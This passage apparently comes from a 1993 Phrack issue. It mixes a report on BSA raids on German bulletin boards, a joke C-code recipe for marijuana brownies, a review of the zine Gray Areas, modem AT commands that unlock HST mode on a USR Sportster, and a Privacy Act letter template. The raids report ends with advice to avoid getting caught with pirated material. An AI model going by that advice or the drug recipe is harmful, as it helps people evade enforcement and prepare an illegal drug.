were just after the computer hardware, especially the hard drives
|
|
and file servers.
|
|
|
|
They usually come with three or four people. All of the search warrants
|
|
they were using were quite old, issued last December.
|
|
|
|
Who is behind those actions?
|
|
First of all the BSA, Business Software Association. They
|
|
were also responsible for the recent raids of US Bulletin Boards.
|
|
In Germany they just announced actions against piracy and
|
|
bulletin boards. The most active BSA Members are Microsoft and
|
|
Lotus Development. Microsoft, Lotus and the BSA are all located
|
|
in Munich, Germany, home of German's most feared lawyer,
|
|
Guenther Freiherr von Gravenreuth. This guy has been fighting
|
|
for years against piracy, young kids who copy games, and especially
|
|
bulletin board systems. He is also affiliated with Ariolasoft, a huge
|
|
German distributor for game labels like Activision and others.
|
|
|
|
In the end, all I can say is:
|
|
Be aware, don't get caught and don't keep illegal stuff on your board!
|
|
|
|
(c) 1993 SevenUp for Phrack
|
|
|
|
******************************************************************************
|
|
|
|
Carlcory's brownies:
|
|
|
|
/* Begin cc_brownie.c */
|
|
|
|
Includes:
|
|
#include "4_squares_baking_chocolate"
|
|
#include "1_cup_butter"
|
|
#include "2_cups_sugar"
|
|
#include "4_eggs"
|
|
#include "2_cups_flour"
|
|
#include "2_tbs_vanilla"
|
|
#include "1_third_cup_marijuana" /*comment out if won't compile
|
|
on your system*/
|
|
#include "1_cup_nuts" /*comment out if won't compile*/
|
|
|
|
void main(void);
|
|
|
|
{
|
|
heat(oven, 350);
|
|
add(butter, chocolate);
|
|
while(texture!='smooth') {
|
|
stir(mixture);
|
|
}
|
|
Add(sugar);
|
|
add(eggs);
|
|
add(vanilla);
|
|
add(flour, pot);
|
|
add(nuts)
|
|
for(timer=0; timer<35; timer++) {
|
|
bake(mixture);
|
|
}
|
|
cool(hour);
|
|
}
|
|
|
|
|
|
/*The high takes about an hour to come on,
|
|
but lasts for 12 hrs. (4 brownies)
|
|
Make sure they cool (don't burn your mouth!)
|
|
and share with friends! */
|
|
|
|
|
|
/*End of cc_brownie.c*/
|
|
|
|
******************************************************************************
|
|
|
|
GRAY AREAS
|
|
Examining the Gray Areas of Life
|
|
|
|
Gray Areas, Inc.
|
|
P.O. Box 808
|
|
Broomall, PA 19008-0808
|
|
(215)353-8238
|
|
grayarea@well.sf.ca.us
|
|
|
|
|
|
Gray Areas is published quarterly and printed on recycled paper. They also
|
|
participate in local recycling efforts involving cans, glass, clothing,
|
|
newspapers, and more.
|
|
|
|
A four-issue subscription costs $18.00 US or $26.00 foreign (payable in US
|
|
funds). A 12-issue subscription costs $50.00 ($75.00 foreign). You may
|
|
purchase a twelve issue subscription and give 4 or 8 or those issues away as
|
|
gifts to friends (i.e., the same 4 issues you receive would also go to 2 other
|
|
recipients). Make check or money order out to Gray Areas, Inc.
|
|
|
|
STATEMENT OF PURPOSE:
|
|
|
|
Gray Areas exists to examine the gray areas of life. We hope to unite people
|
|
involved in all sorts of alternative lifestyles and deviant subcultures. We
|
|
are everywhere! We felt that the government has done a great job of splitting
|
|
people up so that we do not identify with other minority groups anymore. There
|
|
are so many causes now that we often do not talk to others not directly
|
|
involved in our chosen causes. We believe that the methods used to catch
|
|
criminals are the same regardless of the crime and that much can be learned by
|
|
studying how crimes in general are prosecuted and how people's morals are
|
|
judged. It is our mission to educate people so they begin to case more about
|
|
the world around them. Please join our efforts by subscribing, advertising your
|
|
business with us, and by spreading the word about what we're up to.
|
|
|
|
__________________________
|
|
|
|
Review by Knight Lightning:
|
|
|
|
I recently received a copy of the premier issue of Gray Areas, dated Fall 1992
|
|
and with a cover price of $4.50 (US). I was impressed with both the laser
|
|
quality of the printing, artwork, and graphics, as well as the topics and
|
|
content of the articles.
|
|
|
|
I would not characterize Gray Areas as a hacker magazine, but the subject did
|
|
come up in an interview with John Perry Barlow (one of the original founders of
|
|
the Electronic Frontier Foundation) where he discussed the EFF and its role in
|
|
defending civil liberties.
|
|
|
|
No, instead I think it is safe to say that Gray Areas pays a lot of attention
|
|
to the Grateful Dead. Indeed the cover story is titled "Grateful Dead
|
|
Unauthorized Videos." Additionally, there are several other articles
|
|
(including the John Barlow interview) that discuss varying aspects about the
|
|
Dead's history, their politics, and of course their music. An advertisement
|
|
for the next issue of Gray Areas reveals that even more articles relating to
|
|
the Grateful Dead are on the way; so if you are a "Dead Head" you will probably
|
|
fall in love with this magazine!
|
|
|
|
However, the article that I appreciated most was "Zine Scene," a review of 163
|
|
alternative newsletters that included such familiar names as 2600, Hack-Tic,
|
|
Full Disclosure, and TAP; and others that I intend to take a look at like Iron
|
|
Feather's Journal and bOING bOING. The zines reviewed here covered every topic
|
|
imaginable and I thought it was a great buffet for the mind to have such handy
|
|
directory (especially since Factsheet Five went defunct about a year ago).
|
|
|
|
Other interesting articles had to do with video, audio, and software piracy and
|
|
reviews of music and software. I also enjoyed the great artwork found
|
|
throughout the magazine in the form of visual aids, comics, and advertisements.
|
|
|
|
If you are a fan of alternative music or the Grateful Dead, you'll be very
|
|
sorry if you don't subscribe immediately. If you are interested in alternative
|
|
publications with more interesting points of view than Time or Newsweek then
|
|
you owe it to yourself to at least purchase a copy to check it out.
|
|
|
|
- - - - - - - - -
|
|
|
|
All letters sent to Gray Areas are presumed to be for publication unless you
|
|
specifically request that they omit your name or refrain from publishing your
|
|
comments. If you are writing about something which could incriminate yourself,
|
|
they will protect your identity as a matter of policy.
|
|
|
|
******************************************************************************
|
|
|
|
"Turning your USR Sportster w/ 4.1 roms
|
|
into a 16.8K HST Dual Standard"
|
|
|
|
by
|
|
|
|
The Sausage with The Mallet
|
|
|
|
|
|
If you have a USRobotics Sportster FAX modem, Ver 4.1, you can issue
|
|
the following commands to it to turn it into an HST 16.8K dual standard.
|
|
In effect, you add HST 16.8K to its V32.bis 14.4k capability.
|
|
|
|
ats11=40v1L3x4&h1&r2&b1e1b1&m4&a3&k3
|
|
atgw03c6,22gw05cd,2f
|
|
ats14=1s24=150s26=1s32=8s34=0x7&w
|
|
|
|
A very important item is the b1, which tells the modem to use
|
|
the 16.8K HST protocol. If you do not set b1, when the Sportster
|
|
connects with another V32 modem it will go through the CCITT v.32
|
|
connect tones and you will not get a 16.8K connect.
|
|
|
|
If you do get an HST connect, you will not hear the "normal"
|
|
train phase--instead you will hear the HST negotiation which
|
|
sounds like a 2400 baud carrier.
|
|
|
|
Finally, if you change the "cd" in the second line to a "cb", your
|
|
modem will think it is a V.32 Courier instead of an HST 16.8K.
|
|
|
|
Look for other pfine pfiles from Rancid Bacon Productions in conjunction
|
|
with USDA Grade A Hackers (UGAH.) Accept no substitutes.
|
|
|
|
*******************************************************************************
|
|
|
|
Request to Post Office on Selling of Personal Information
|
|
|
|
In May 1992, the US Postal Service testified before the US House of
|
|
Representatives' Government Operations Subcommittee that National Change of
|
|
Address (NCOA) information filled out by each postal patron who moves and
|
|
files that move with the Post Office to have their mail forwarded is sold to
|
|
direct marketing firms without the person's consent and without informing
|
|
them of the disclosure. These records are then used to target people who
|
|
have recently moved and by private detective agencies to trace people, among
|
|
other uses. There is no way, except by not filling out the NCOA form, to
|
|
prevent this disclosure.
|
|
|
|
This letter is to request information on why your personal information
|
|
was disclosed and what uses are being made of it. Patrons who send in this
|
|
letter are encouraged to also forward it and any replies to their
|
|
Congressional Representative and Senators.
|
|
|
|
|
|
Eligible requestors: Anyone who has filed a change of address notice with
|
|
the Postal Service within the last five years.
|
|
|
|
|
|
|
|
Records Officer
|
|
US Postal Service
|
|
Washington, DC 20260 PRIVACY ACT REQUEST
|
|
|
|
|
|
Dear Sir/Madam:
|
|
|
|
This is a request under the Privacy Act of 1974 (5 USC 552a). The Act
|
|
requires the Postal Service, as a government agency, to maintain an
|
|
accounting of the date, nature, and purpose of each disclosure of
|
|
information about individuals. I request a copy of the accounting of all
|
|
disclosures made of address change and mail forwarding information that I provided
|
|
to the Postal Service. This information is maintained in USPS System of
|
|
Records 010.010.
|
|
|
|
On or about (date), I filed a change of address notice requesting that my
|
|
mail be forwarded from (old address) to (new address). The name that I used
|
|
on the change of address form was (name).
|
|
|
|
This request includes the accounting of all disclosures made by the Postal
|
|
Service, its contractors, and its licensees.
|
|
|
|
I am making this request because I object to the Postal Service's policy of
|
|
disclosing this information without giving individuals an option to prevent
|
|
release of this information. I want to learn how my information has been
|
|
disclosed and what uses have been made of it. Please let the Postmaster
|
|
General know that postal patrons want to have a choice in how change of
|
|
address information is used.
|
|
|
|
If there is a fee in excess of $5 for this information, please notify me in
|
|
advance. Thank you for consideration of this request.
|
|
|
|
|
|
Sincerely,
|
|
|
|
|
|
|
|
CC: Your Congressional Representative
|
|
US House of Representatives
|
|
Washington, DC 20510
|
|
|
|
Your Senators
|
|
US Senate
|
|
Washington, DC 20515
|
|
|
|
-------------------------------------------------------------------------------
|
|
|